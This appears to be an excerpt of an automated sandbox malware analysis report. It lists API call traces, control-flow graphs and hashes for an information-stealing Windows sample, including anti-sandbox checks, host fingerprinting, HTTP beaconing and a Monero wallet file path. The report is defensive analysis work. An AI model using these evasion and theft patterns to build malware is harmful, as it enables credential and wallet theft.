1337->1355 1338->1355 1339->1313 1340->1339 1341->1313 1342->1341 1343->1313 1344->1343 1345->1346 1346->1313 1347->1313 1348->1347 1349->1313 1350->1349 1355->1313
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 002F17C5
                  • ExitProcess.KERNEL32 ref: 002F17D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 812d26e5b889bbf735363d138290d1c4f7517d4171e97c856d13d666de6cd93e
                  • Instruction ID: 79231bce5f49ebeffd9a0ceaadfd2ddde8a5da8f4aa6bae4b8a7deac416127bc
                  • Opcode Fuzzy Hash: 812d26e5b889bbf735363d138290d1c4f7517d4171e97c856d13d666de6cd93e
                  • Instruction Fuzzy Hash: 775150B4A2020EEBCB04DFA0D9A4BBEB7B5BF44784F504068E60667240D7B0D975DB62
                  Function 002F7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1356 2f7500-2f754a GetWindowsDirectoryA 1357 2f754c 1356->1357 1358 2f7553-2f75c7 GetVolumeInformationA call 2f8d00 * 3 1356->1358 1357->1358 1365 2f75d8-2f75df 1358->1365 1366 2f75fc-2f7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 2f75e1-2f75fa call 2f8d00 1365->1367 1369 2f7619-2f7626 call 2fa740 1366->1369 1370 2f7628-2f7658 wsprintfA call 2fa740 1366->1370 1367->1365 1377 2f767e-2f768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 002F7542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002F757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F760A
                  • wsprintfA.USER32 ref: 002F7640
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\$0
                  • API String ID: 1544550907-3036396339
                  • Opcode ID: 6626fe3b94347e82a9a8a8f2e9e7514bac8de4604aa9609d0a5a81e48c9661f3
                  • Instruction ID: 8d2cd7a0b1c92d2cdf9cf40c0cb9b6a0ef0a34db3465ec555c304676f593d835
                  • Opcode Fuzzy Hash: 6626fe3b94347e82a9a8a8f2e9e7514bac8de4604aa9609d0a5a81e48c9661f3
                  • Instruction Fuzzy Hash: 40417FB1D1424CABDB10DFA4DC45BEEFBB8AF18744F1000A8F609A7280DB746A54CFA5
                  Function 002F69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320798), ref: 002F98A1
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013207B0), ref: 002F98BA
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320660), ref: 002F98D2
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013206C0), ref: 002F98EA
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320810), ref: 002F9903
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013289A0), ref: 002F991B
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013166E0), ref: 002F9933
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013166A0), ref: 002F994C
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320828), ref: 002F9964
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013207C8), ref: 002F997C
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320840), ref: 002F9995
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01320570), ref: 002F99AD
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,01316A20), ref: 002F99C5
                    • Part of subcall function 002F9860: GetProcAddress.KERNEL32(75900000,013206D8), ref: 002F99DE
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002E11D0: ExitProcess.KERNEL32 ref: 002E1211
                    • Part of subcall function 002E1160: GetSystemInfo.KERNEL32(?), ref: 002E116A
                    • Part of subcall function 002E1160: ExitProcess.KERNEL32 ref: 002E117E
                    • Part of subcall function 002E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002E112B
                    • Part of subcall function 002E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 002E1132
                    • Part of subcall function 002E1110: ExitProcess.KERNEL32 ref: 002E1143
                    • Part of subcall function 002E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 002E123E
                    • Part of subcall function 002E1220: __aulldiv.LIBCMT ref: 002E1258
                    • Part of subcall function 002E1220: __aulldiv.LIBCMT ref: 002E1266
                    • Part of subcall function 002E1220: ExitProcess.KERNEL32 ref: 002E1294
                    • Part of subcall function 002F6770: GetUserDefaultLangID.KERNEL32 ref: 002F6774
                    • Part of subcall function 002E1190: ExitProcess.KERNEL32 ref: 002E11C6
                    • Part of subcall function 002F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002E11B7), ref: 002F7880
                    • Part of subcall function 002F7850: RtlAllocateHeap.NTDLL(00000000), ref: 002F7887
                    • Part of subcall function 002F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 002F789F
                    • Part of subcall function 002F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7910
                    • Part of subcall function 002F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 002F7917
                    • Part of subcall function 002F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 002F792F
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013289B0,?,0030110C,?,00000000,?,00301110,?,00000000,00300AEF), ref: 002F6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 002F6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 002F6AF9
                  • Sleep.KERNEL32(00001770), ref: 002F6B04
                  • CloseHandle.KERNEL32(?,00000000,?,013289B0,?,0030110C,?,00000000,?,00301110,?,00000000,00300AEF), ref: 002F6B1A
                  • ExitProcess.KERNEL32 ref: 002F6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 9b221454ed7beb70d35a8c3ffc6d797dadbc21c29165ddb51c8f061f01afa0b6
                  • Instruction ID: dd2cbb839de4b518433479173e066c73bbf496e3ee3b052c70f08cc41f56b40e
                  • Opcode Fuzzy Hash: 9b221454ed7beb70d35a8c3ffc6d797dadbc21c29165ddb51c8f061f01afa0b6
                  • Instruction Fuzzy Hash: 05310C7196010CAADB04FBA0DC56AFEB738AF147C0F404538F306A6181DFB06A25DEA6
                  Function 002E1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1436 2e1220-2e1247 call 2f89b0 GlobalMemoryStatusEx 1439 2e1249-2e1271 call 2fda00 * 2 1436->1439 1440 2e1273-2e127a 1436->1440 1441 2e1281-2e1285 1439->1441 1440->1441 1443 2e129a-2e129d 1441->1443 1444 2e1287 1441->1444 1447 2e1289-2e1290 1444->1447 1448 2e1292-2e1294 ExitProcess 1444->1448 1447->1443 1447->1448
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 002E123E
                  • __aulldiv.LIBCMT ref: 002E1258
                  • __aulldiv.LIBCMT ref: 002E1266
                  • ExitProcess.KERNEL32 ref: 002E1294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: ef2b5c4eabe0de151ae04922570642e9b23ef3d820a16824ac04aca48632da0b
                  • Instruction ID: 95cceaba4d4442f7cede520665fb63762017ea253dbe3adf6049c19f040b7303
                  • Opcode Fuzzy Hash: ef2b5c4eabe0de151ae04922570642e9b23ef3d820a16824ac04aca48632da0b
                  • Instruction Fuzzy Hash: DF014FB0990348ABDB10DBD1CC49BADB778AF14701F608064EB05B6284D6B455659B59
                  Function 002F6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1450 2f6af3 1451 2f6b0a 1450->1451 1453 2f6b0c-2f6b22 call 2f6920 call 2f5b10 CloseHandle ExitProcess 1451->1453 1454 2f6aba-2f6ad7 call 2faad0 OpenEventA 1451->1454 1459 2f6ad9-2f6af1 call 2faad0 CreateEventA 1454->1459 1460 2f6af5-2f6b04 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013289B0,?,0030110C,?,00000000,?,00301110,?,00000000,00300AEF), ref: 002F6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 002F6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 002F6AF9
                  • Sleep.KERNEL32(00001770), ref: 002F6B04
                  • CloseHandle.KERNEL32(?,00000000,?,013289B0,?,0030110C,?,00000000,?,00301110,?,00000000,00300AEF), ref: 002F6B1A
                  • ExitProcess.KERNEL32 ref: 002F6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 31c43f8e7e10b9a376da92e97f81bc3cd1110422b9f6c494fea391e3b07c0e11
                  • Instruction ID: f29165efcdf32917c451b30ecab8a5b6b785bbe3788445d96f872ad70b5ff1cf
                  • Opcode Fuzzy Hash: 31c43f8e7e10b9a376da92e97f81bc3cd1110422b9f6c494fea391e3b07c0e11
                  • Instruction Fuzzy Hash: 24F03A7096021EABE710ABA0DC0EBBDBA34FF14B85F104524F703A1181DBF05565EA56
                  Function 002E47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002E4839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 002E4849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 15c04d35d8c99139f1e9f567892b43e382c8876d54038f7223b22ee61cbf9a93
                  • Instruction ID: e37ec1b40e4ab6ab474ddd96c232415c70bea586df34bc9980f0843b0656c6a0
                  • Opcode Fuzzy Hash: 15c04d35d8c99139f1e9f567892b43e382c8876d54038f7223b22ee61cbf9a93
                  • Instruction Fuzzy Hash: 79215EB1D00208ABDF10DFA5EC45ADEBB74FF45320F108625FA15A7290EB706A0ACF81
                  Function 002F51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E6280: InternetOpenA.WININET(00300DFE,00000001,00000000,00000000,00000000), ref: 002E62E1
                    • Part of subcall function 002E6280: StrCmpCA.SHLWAPI(?,0132F360), ref: 002E6303
                    • Part of subcall function 002E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002E6335
                    • Part of subcall function 002E6280: HttpOpenRequestA.WININET(00000000,GET,?,0132EB40,00000000,00000000,00400100,00000000), ref: 002E6385
                    • Part of subcall function 002E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002E63BF
                    • Part of subcall function 002E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002E63D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002F5228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 3bb36c8b9ca4939ddf4e6292b27a7c5ec0309e233041d500525eecc7b5474646
                  • Instruction ID: b16a4da51309ebd2efeb22b750cf52c97cbe838579c790fba82e45a7e4398fde
                  • Opcode Fuzzy Hash: 3bb36c8b9ca4939ddf4e6292b27a7c5ec0309e233041d500525eecc7b5474646
                  • Instruction Fuzzy Hash: 6C11D07092014CA7DB14FF64DD529FDB378AF50380F808274FA1A56592EF706B25CE51
                  Function 002F78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F7910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F7917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 002F792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: c879f3ea6836ccb71e6dbc283007c906c473cf335312c7464acdf630838fbadf
                  • Instruction ID: 802eaad19d275122f0de81aeab20040e350abb8a5b314a7e7f89ba97bcfec2c3
                  • Opcode Fuzzy Hash: c879f3ea6836ccb71e6dbc283007c906c473cf335312c7464acdf630838fbadf
                  • Instruction Fuzzy Hash: BF01A4B1A14209EFC714DF98DD45FAEFBB8FB05B61F10422AFA45E3280C7B459048BA1
                  Function 002E1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002E112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 002E1132
                  • ExitProcess.KERNEL32 ref: 002E1143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
